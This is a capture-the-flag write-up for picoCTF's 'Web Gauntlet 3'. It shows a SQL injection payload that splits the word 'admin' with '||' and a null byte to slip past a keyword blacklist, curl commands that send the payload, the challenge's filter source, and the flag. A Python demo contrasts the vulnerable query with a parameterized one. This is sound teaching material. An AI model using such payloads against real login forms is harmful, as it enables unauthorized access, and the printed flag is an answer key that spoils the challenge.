# Web Gauntlet 3

## Problem

> Last time, I promise! Only 25 characters this time. Log in as admin Site: <http://mercury.picoctf.net:32946/> Filter: <http://mercury.picoctf.net:32946/filter.php>

## Solution

1. The solution to this challenge is completely identical to my solution to [Web Gauntlet 2](https://picoctf2021.haydenhousen.com/web-exploitation/web-gauntlet-2).
2. The solution payload is `user=ad'||'min'%00`. It can be sent with cURL like so:

   ```bash
   curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
   ```

   The flag can then be retrieved with:

   ```bash
   curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
   ```

   See [Web Gauntlet 2](https://picoctf2021.haydenhousen.com/web-exploitation/web-gauntlet-2) for more information.
3. The code for the filter and the flag is shown in `/filter.php` once the login is bypassed:

   ```php
   <?php
   session_start();

   if (!isset($_SESSION["winner3"])) {
       $_SESSION["winner3"] = 0;
   }
   $win = $_SESSION["winner3"];
   $view = ($_SERVER["PHP_SELF"] == "/filter.php");

   if ($win === 0) {
       $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
       if ($view) {
           echo "Filters: ".implode(" ", $filter)."<br/>";
       }
   } else if ($win === 1) {
       if ($view) {
           highlight_file("filter.php");
       }
       $_SESSION["winner3"] = 0;        // <- Don't refresh!
   } else {
       $_SESSION["winner3"] = 0;
   }

   // picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
   ?>
   ```
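The filter above is a keyword blacklist: `'||'` splits the banned substring `admin` so the check passes, SQLite's `||` operator concatenates the pieces back into `admin` at query time, and the `%00` terminates the C string so the password clause is dropped. The following Python example is added here (it is not part of the original writeup or the challenge) to reproduce that behaviour against an in-memory SQLite table and contrast it with the parameterized query that defeats it; the query shape, the case-insensitive substring matching and the sample row are assumptions.

```python
import sqlite3

# Blacklist copied from the challenge's filter.php, plus the 25-character cap
# from the problem statement. Case-insensitive substring matching is an
# assumption about how the challenge applies it (the page does not show that).
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
          ";", "--", "/*", "*/", "admin"]
MAX_LEN = 25


def passes_filter(value: str) -> bool:
    """True if the blacklist would let this input through."""
    low = value.lower()
    return len(value) <= MAX_LEN and not any(bad in low for bad in FILTER)


def make_db() -> sqlite3.Connection:
    """In-memory SQLite table with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return conn


def vulnerable_login(conn, user: str, pw: str):
    """Query built by string concatenation (assumed shape; not shown on the page).

    A C string ends at the first NUL, which is what the writeup's %00 relies on.
    Python's sqlite3 rejects an embedded NUL in a statement, so that truncation
    is modelled explicitly before the query runs.
    """
    query = f"SELECT name FROM users WHERE name='{user}' AND pass='{pw}'"
    query = query.split("\x00", 1)[0]
    return conn.execute(query).fetchone()


def safe_login(conn, user: str, pw: str):
    """Parameterized query: input is bound as data, so '||' is never parsed as SQL."""
    return conn.execute(
        "SELECT name FROM users WHERE name=? AND pass=?", (user, pw)
    ).fetchone()


if __name__ == "__main__":
    payload = "ad'||'min'\x00"  # the page's user=ad'||'min'%00 after URL decoding
    db = make_db()
    print("filter passes:", passes_filter(payload))          # True
    print("vulnerable:", vulnerable_login(db, payload, "a"))  # ('admin',)
    print("parameterized:", safe_login(db, payload, "a"))     # None
```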

### Flag

`picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}`
